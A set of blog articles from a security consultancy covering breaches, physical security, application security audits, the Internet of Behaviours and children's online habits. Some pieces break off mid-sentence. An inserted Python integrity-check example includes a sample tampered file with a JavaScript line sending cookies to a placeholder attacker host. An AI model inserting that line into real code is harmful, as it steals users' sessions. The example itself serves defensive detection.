Organisations in the digital ecosystem spend millions establishing controls to protect their corporate networks from data breaches. This does not change the fact that breaches still occur, even in the most secure infrastructures. Looking at past incidents, high-profile breaches at giant firms such as SolarWinds, Marriott, Fastly, Colonial Pipeline, Electronic Arts (EA) and many others have involved stolen sensitive information, major economic and security-related impact and reputational damage. Ransomware is on the rise, targeting mostly SMEs (small and medium enterprises), and, worryingly, supply chain weaknesses feature in many security breaches. Attackers infiltrate email servers, file servers and core systems through unknown or unpatched vulnerabilities with little effort and open the door to tons of confidential data: the sensitive records that companies such as Marriott and Microsoft, as well as government entities, collect from their customers and citizens. Such data typically includes email addresses, passwords, social security numbers and the like.

Why data breaches when organizations invest heavily in network security? It is not obvious why organizations that have set aside security budgets and adequate controls are still compromised. Is it a question of limited resources, of the cybersecurity skills gap, or of inadequate budgets in some organizations? Many enterprises do experience breaches for these reasons. But while these factors certainly play a part, the key issue is that most organizations do not grasp the gravity of the matter and make no effort to locate the weaknesses in their attack surface until systems are compromised. Only then do they wake up and invest heavily in identifying the cause of the breach.
By the time they do, it is too late to prevent the aftermath of the breach or reduce its impact. Attackers have the edge: they look for every opportunity available to them and need to succeed only once to get into the corporate network and reach sensitive information, whereas security teams and network defenders need to succeed every time. As the digital ecosystem keeps scaling, so do adversaries, who now find it easy to use automated and AI-driven tools to profile the security landscape of target systems and attack corporate networks with ease.

Levelling the playing field against attackers

With increasing cyber incidents, organizational security teams face a range of challenges: social engineering attempts, advanced persistent threats (APTs), ransomware, unpatched systems and supply chain risks, among others. The company's threat landscape requires constant vigilance. Organizations must keep up, adopt best practices and training, and ensure their teams are well staffed to detect and respond to attacks on an ever-increasing attack surface. To this end, organizations should do the following to level the playing field against threat actors who work tirelessly to compromise the safety and security of your company's IT infrastructure and data.

Train, educate and prepare your entire organization

With the ever-evolving threat landscape, organizations should build a strong security culture, starting with training staff in basic security knowledge: how to identify, anticipate and protect company information systems. This goes alongside preventive technical steps such as keeping offline encrypted backups, restricting user permissions and restricting privileges. Security leaders should educate and prepare the organization's staff to serve as ambassadors for cyber safety in the organization.
To that end, employees at all levels should be educated in the basics of cyber safety. Train them on the most common types of cyber threats (malware, phishing, ransomware and man-in-the-middle attacks) as well as basic network security terms, for example the meaning and significance of endpoint security and of the organization's firewall. In educating your team, remember that practice also matters. Role-plays that test employees' diligence before opening an email, clicking a link or sending sensitive or financial information by email are an investment that can pay untold dividends in protecting the organization against a cyber-attack and the business interruptions, legal risks and reputational harm that often follow.

Empower your incident response team

During an attack, the incident response team should be well equipped, knowledgeable about cyber safety and prepared to respond. The team should be proactive and provide top management with a strategy to mitigate attacks. It files incident reports that top management uses as a benchmark for ongoing decisions on enforcing a security culture, and it guides the corporate board in assessing and responding to a breach. The team should include professionals with authority and expertise in IT, operations, human resources, and internal and external communications. It must act quickly to limit the scope of the attack and assess any damage or ongoing risk. To assist with this, the response team should also include legal counsel.
Working with a legal professional streamlines the crafting of internal and external communications about the suspected incident, the management of law enforcement and governmental reporting where necessary, and the conduct of an internal investigation in a way that preserves the organization's attorney-client privilege and work-product protection where appropriate.

Automating security practices

Just as attackers automate their reconnaissance and target profiling to understand the target and its weaknesses, automation can be a big part of the solution. Regardless of industry or application, automating routine tasks lets security teams concentrate on the harder problem-solving work of defending the network. That problem-solving work fosters innovation and can lead to a more resilient security organization. Products that automate threat detection, threat identification and risk profiling are widespread, and most organisations have already deployed automation somewhere. Automation enables an organisation to be proactive about improving its cyber resilience rather than being a gold mine for attackers. Automated
Physical security: what organizations are lacking in their security strategy?
Physical security is the protection of company data, sensitive and high-priority information, corporate networks, software, company equipment and personnel. It is affected by two kinds of threat: natural events such as fire, flood and power fluctuations, and malicious attacks by threat actors, which may take the form of terrorism, vandalism or theft. Physical security minimizes these risks to information systems and information. Systems and devices give attackers additional attack vectors, since a device in the wrong hands can be used to connect to corporate networks, infect other devices and exfiltrate data; access to systems, equipment and their operating environments should therefore be limited to authorized individuals, and multiple layers of physical security can be used to protect the most critical assets and services.

What is physical security?

According to the Dictionary of Military and Associated Terms, physical security is the part of security concerned with physical controls designed to safeguard personnel; to prevent unauthorized access to equipment, installations, material and documents; and to safeguard them against espionage, sabotage, damage and theft. Physical security is often regarded as the "forgotten side of security", yet it is a key element of an overall company protection strategy. Proprietary, sensitive and classified company material must be kept from those who have no need to know. This is done by keeping unauthorized personnel from entering restricted areas: general traffic flow should be diverted away from such areas to minimize unauthorized entry, authorized personnel should carry something that identifies them, say a company badge, and everyone with authorized access should appear on an access list; anyone not on the list is not authorized.

Why your organization needs physical security compliance
Security is crucial to any firm; we are the information gatekeepers at all times. We protect the organization from all threats, whether malicious, internal or environmental, and we need to be vigilant and confident that our work is regarded as a necessary operational function for the overall security and protection of company assets. Organizational assets can be categorized as employees, information and intellectual property; protecting these three is the cornerstone of our profession.

What are the common physical security threats in your environment?

When organizations establish their security strategy, it is good practice to include a physical security plan for existing property or a new build. The organization should bear in mind the common physical security threats and vulnerabilities and how each type should be countered. Threats arise at every stage of the design, implementation and maintenance of company property. Common physical security threats include vandalism, theft and burglary, sabotage and terrorism, unaccounted-for visitors, stolen identification and social engineering.

How should your organization handle physical security risk?

To answer this, consider what could go wrong, or the aftermath of a physical security breach. Imagine an attacker finds their way into the workspace or onto the corporate network. All information systems and information are then vulnerable to compromise and theft. Computer systems and endpoint devices may be left unattended outside the view of security cameras; workstations may be left unlocked with access to files, network shares and other network resources; and sensitive or confidential data may be open in plain view on screen, where it can be captured, stolen, modified or deleted.
Once an attacker has access, their actions are not predictable. The only way to limit them is to implement measures and enforce best practices that protect the organization's intellectual property and digital assets. The following are the bare minimum organizations can do to reduce the likelihood and impact of physical attacks:

1. Put a physical security policy in place. Organizations of any size should implement a physical security policy, both to comply with industry security standards and to set out the physical security requirements themselves. Do you have a physical security policy in place? If not, start from a template and create one for your organization.
2. Lock workstations and put down screens when not in use. Organizations should run awareness sessions that train staff on the importance of locking their workstations when stepping away, to protect the sensitive information on them. IT security teams should enforce a policy that locks screens automatically after a period of inactivity and locks accounts after repeated failed access attempts.
3. Provide adequate security for all physical devices. Enable a password or passcode, or an additional authentication factor, on all devices to prevent unauthorized access if a device is lost or stolen.
4. Do not share login credentials or other sensitive information. Credentials and other sensitive information should remain private: never shared with anyone, posted in plain view, or saved on a computer or other platform.
5. Keep several backup copies. Protect information against malware, hardware failure, damage, loss or theft by making multiple copies and storing them offline.
6. Implement endpoint security. IT departments should deploy endpoint detection and response software, host-based firewalls, and device and file encryption, and keep devices updated with the latest security patches.
7. Record instances of theft, of identities or devices, and remediate. IT departments should monitor system and network access logs for signs of unauthorized access and exfiltration, and use remote administration and remote-wipe solutions to regain control of stolen devices.
8. Enable two-step verification before system access. Multi-factor authentication (MFA) is the use of two or more authentication mechanisms to access an account or service. It significantly reduces the risk of account compromise through credential theft when a password has been exposed: even if a criminal obtains a user's username and password, they cannot access the account without the second factor.
9. Invest in education and security awareness training. Organizations should invest time, money,
Applications harbour plenty of low-hanging fruit for attackers: have you protected yours?
Did you know that 99.7% of applications have at least one vulnerability? Findings from Verizon's 2020 Data Breach Investigations Report show that attackers exploit application weaknesses and software vulnerabilities to conduct data breaches against organizations, and that this is the most common external attack method. More statistics from security researchers indicate that application vulnerabilities will remain a common attack method. Attackers lurk in the digital sphere hunting for software vulnerabilities and exposed web applications. This should be an eye-opener for anyone concerned about the sensitivity of the information in their applications, and for anyone who develops their organization's applications. I have to admit that, as a security practitioner, I am not at all surprised by that number.

Applications bear low-hanging fruit that attracts attackers

In the cybersecurity threat landscape survey we conducted in June-July 2021, the threats organizations reported encountering most were software vulnerabilities and web application threats. Research by the Ponemon Institute, The Increasing Risk to Enterprise Applications, found that "the investment in application security is not commensurate with the risk": the report notes a significant gap between the level of application risk and what companies spend to protect their applications, while "the level of risk to other assets like networks is much lower than the investment in network security."

But most applications are made by big vendors; could they also be vulnerable?

Amazon, Microsoft and Google have much bigger security budgets than you do. They have hundreds of people around the world ensuring that their infrastructure is secure, and their teams constantly review their code, looking for flaws, vulnerabilities and potential exploits.
They monitor hacking forums and run attractive bug-bounty programs to stay proactive. Only a few years ago, kernel errors were prevalent; now Microsoft's and Linux's teams have sharply reduced the number of reported kernel vulnerabilities. For example, according to the CVE database, the Linux kernel had 169 code execution vulnerabilities in 2017, only three in 2018 and just five in 2019.

Are cloud applications safer?

In much of our field security work we exchange thoughts with leaders of various organizations about securing evolving technology, and organizations tend to compare their own infrastructure to the cloud. Cloud providers do take many precautions and invest heavily in securing the cloud. The catch is that cloud customers remain responsible for the security of their own applications in the cloud, and this is where the danger lies. Very many organizations have their own developers or outsource their application requirements to external software vendors. In most cases the developers build on software architectures or templates distributed across the public cloud and use them to develop the applications the organization uses to handle sensitive information. The pieces of code and templates that developers customize into those applications consist of code written from scratch, open-source code and third-party products over which the developers have no control, and each brings its own weaknesses and threats. When these weaknesses are not addressed, they lead to security compromises. Attackers are well aware that developers do not prioritise security in the software development life cycle, or miss certain aspects of it. This gives them the chance to alter existing applications or inject additional code, turning legitimate software into malicious software.
This kind of vulnerability falls into the "code execution" category, the biggest group in the CVE database. "Research has it that on average, organizations need more than 50 days to patch known vulnerabilities. But on the other hand, hacktivists just need a few minutes to locate these and exploit them to their interests."

Applications are a potential threat to the security of an organization's critical information systems. How do we protect them?

For an environment in which existing software applications carry manageable risk, organizations need to make sure that their application security practices evolve beyond the traditional approach of blocking traffic. Investing heavily in network security is not enough; application security needs attention on several fronts. This means investing in application security testing tools throughout the software development life cycle. Security scanning tools identify areas of weakness and malicious code so that they can be remediated during development, before the application runs in production: their goal is prevention, and they are not the whole solution. Runtime protection, which works while applications are in production, provides an extra layer of protection, but it is not an alternative to scanning. In our security assessments at Summit Consulting Ltd we have conducted vulnerability assessments on thousands of applications over the years, and what worries us is that we have not encountered a single application without a vulnerability.

Conclusion

If you have not yet done a security audit (VAPT) of your application, get up to speed and conduct one right away. And if you have been there before, I am confident you know the value of regular audits by now.
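One concrete, build-time control for the third-party code and templates discussed above, as an added example that is not the article's or any vendor's code: pin a SHA-256 hash of every vendored file in a manifest when the components are reviewed, and refuse to build when a file has changed, gone missing or appeared unreviewed. The artifacts, the manifest and the tampered tree below are constructed in memory for the example; a real build would read them from disk.

```python
"""Integrity gate for third-party components pulled into a build.

Added illustration, not code from the original article or any vendor. It
shows one way to notice that a vendored dependency or template has been
altered before it ships: a manifest pins one SHA-256 per file, and the
build is refused when any pinned file no longer matches, is missing, or
an unpinned file has appeared. Artifacts below are constructed in memory.
"""
import hashlib
import json
from typing import Dict, List


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_manifest(artifacts: Dict[str, bytes]) -> str:
    """Produce the pinned manifest (JSON) at the moment the components are reviewed."""
    pins = {name: sha256_hex(blob) for name, blob in sorted(artifacts.items())}
    return json.dumps({"version": 1, "files": pins}, indent=2)


def verify_manifest(manifest_json: str, artifacts: Dict[str, bytes]) -> List[str]:
    """Return a list of findings; an empty list means every pinned file is intact."""
    pins = json.loads(manifest_json)["files"]
    findings: List[str] = []
    for name, expected in pins.items():
        if name not in artifacts:
            findings.append(f"MISSING  {name}")
            continue
        actual = sha256_hex(artifacts[name])
        if actual != expected:
            findings.append(f"MODIFIED {name} expected={expected[:12]} actual={actual[:12]}")
    for name in artifacts:
        if name not in pins:
            findings.append(f"UNPINNED {name} (not in manifest)")
    return findings


def gate(manifest_json: str, artifacts: Dict[str, bytes]) -> bool:
    """Build gate: True only if nothing changed since the components were reviewed."""
    return not verify_manifest(manifest_json, artifacts)


# Constructed sample: a vendored JS helper and a deployment template as reviewed.
REVIEWED: Dict[str, bytes] = {
    "vendor/helper.js": b"export function sum(a, b) { return a + b; }\n",
    "templates/deploy.yaml": b"replicas: 2\nimage: app:1.0\n",
}
MANIFEST = build_manifest(REVIEWED)

# Constructed sample: the same tree after someone appended code to the helper
# (the injected-code case the article describes) and dropped in an unreviewed file.
TAMPERED: Dict[str, bytes] = dict(REVIEWED)
TAMPERED["vendor/helper.js"] += b"fetch('https://attacker.example/c?d=' + document.cookie);\n"
TAMPERED["vendor/extra.js"] = b"// never reviewed\n"


if __name__ == "__main__":
    print("reviewed tree passes gate:", gate(MANIFEST, REVIEWED))
    print("tampered tree passes gate:", gate(MANIFEST, TAMPERED))
    for finding in verify_manifest(MANIFEST, TAMPERED):
        print("  ", finding)
```

The manifest must be committed alongside the code and protected by review, otherwise an attacker who can alter a vendored file can simply update its pin as well; the gate is a detection of drift since review, not a judgement that the reviewed code itself was free of weaknesses, which is what the scanning described above is for.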
Ready for your first VAPT? Have questions? Contact +256782610333 or strategy@summitcl.com
Technology intertwined with human behaviour: what are the implications?
In this digital generation, the great shift to mobile devices and technology adoption has changed how we interact: how we use these devices, how we respond to activity on them, and what we feed into applications all reveal a great deal about our behaviour, what we love, our preferences and our everyday digital life. This has given rise to the "Internet of Behaviours (IoB)". In its strategic predictions for 2020, Gartner said that the Internet of Behaviours is an increasing trend that will become known to everyone, and as digital practitioners we may have no choice but to live with it as a society. Gartner also predicted that by 2023, 40% of the global population will have their activities tracked digitally in order to influence their behaviour. In this article we focus on what the Internet of Behaviours is, how businesses benefit from it, how enterprises turn the data collected from users' online activities into something profitable, and the privacy and security concerns that come with this emerging technology.

What is the Internet of Behaviours?

The Internet of Things (IoT) is a network of interconnected physical objects that gather and exchange information over the internet. The Internet of Behaviours extends the IoT: the interconnected devices sharing information produce vast new data sources, namely the data that clients provide as they interact with company applications and with other users of technology. Organizations get access to this data through the sharing features of connected devices. Take the example of a smartphone with its geolocation feature.
The phone can track the user's online activities and movements between geographical locations. Organizations can take advantage of this by linking your smartphone with your laptop, your voice assistants and cameras at home, your car cameras, and your phone records (texts and calls). From this, companies can learn a lot about their employees, including their interests, social behaviours, character and online interests.

The value of the Internet of Behaviours to organizations

With evolving technology, organizations have benefited in multiple ways, from engaging customers to understanding where their interest in a product begins, their purchase journey and the habits they exhibit when buying the products they choose. As a tool, the Internet of Behaviours applies behavioural analysis and psychology to study data about users that was previously unobtainable: customers' likes and preferences, the most-visited products on a platform, and the behavioural patterns they show while buying the products they like. The IoB also notes how clients interact with their mobile devices in daily life. Going forward, organizations can use the IoB as a powerful marketing and sales tool. Businesses gain a deep understanding of their customers, which helps them shape product and marketing strategies to create and promote products that users will want to buy, boosting sales.

Security and privacy issues brought about by the IoB

Where data is abundant, concern about its privacy and security follows. The IoB itself is not widely regarded as problematic; many technology users have no problem syncing their devices. The concern is with how the data is collected, navigated and used.
Among the challenges facing this emerging technology, the security and privacy of the data is a growing concern. Many users admit that security complications and inadequacies may slow their adoption and use of certain IoT devices. Cybersecurity experts find the IoT and IoB problematic because of the lack of a defined structure or legal framework. The IoB links user data to the user's decision-making, and IoT devices do not gather user data solely from the user's relationship with a single company. For example, a car insurance company in Uganda can look through a summary of a user's driving history; worse, with the IoB the insurer may also gain access to the user's social media profiles and interactions to better understand or "predict" their driving. This goes beyond the law and beyond users' data privacy. Nor is the concern limited to the devices: without users' knowledge, many companies distribute or sell user data across company lines without permission.

Conclusion

The emerging technology proves beneficial for enterprises, which can optimize their relationship with users based on the collected data. We have seen how the IoT works by converting collected data about users' behaviour into information; the question remains whether the IoB will translate that information from our data into real wisdom.
The Incognito kids
In the good old days, before COVID-19, the easiest way to keep children from online dangers was to not give them Internet access. As someone who has investigated several cases of cyberbullying, online identity theft, cyber harassment and, of course, cyber ransoms against kids involving nudity and threats, I know first-hand why irresponsible online access can lead to long-term suffering for victims. However, the lockdown made online learning a must. Now, all children must access the Internet to attend virtual classes. In addition to whitelisting the acceptable sites, the kids now know about the virtual private network (VPN), thanks to the government's OTT, which helped proliferate and create awareness of VPNs. When technical solutions fail, you go moral. I had to introduce family values: While online, make the right choices. The internet is like electricity: if you use it well, it will give you light and power for life's essentials; if you use it badly, it will burn you, and your house. When you are online, you are in a huge city. You must go to places you know; otherwise, you will be kidnapped and killed by strangers. The Internet is like a restaurant with so many foods on the menu; you must choose what you love eating. Even if you see many things for download, do not click unless you know what you are downloading. Personal hygiene, sanitation, academic excellence and discipline are your guides. Keep your computer clean. Don't drink or eat over the keyboard. Try to learn as much as you can online and listen to your parents, elders and teachers. Today, one of my kids came to tell me, "Daddy, I have seen someone using Incognito in Chrome." I was surprised. Incognito. It's something that even we cybersecurity folks take time to come to grips with. And then when he also told me that "they also downloaded TOR", I got scared. How are the kids finding out these things?
The other time, when I disabled WhatsApp on the phone, the kid found a way to connect to it via the browser. She was so disciplined: she stopped asking for a phone for over two weeks, and I was feeling so excited that my girl had overcome her weakness for the mobile phone. However, a chance encounter with her laptop made me catch her live on WhatsApp. "The Zoom sessions are always sent via WhatsApp, and since I could not access the phone, I had to connect directly using the QR code", she said to my face. OK, no worries. Next time, do ask. How do you parent kids that are savvier than you? These Incognito kids have challenged me. I will not tire of telling them about the opportunities the Internet has to offer, and the dangers therein. I pray they choose well. Copyright Mustapha B Mugisa, 2021 Mr Strategy. All rights reserved.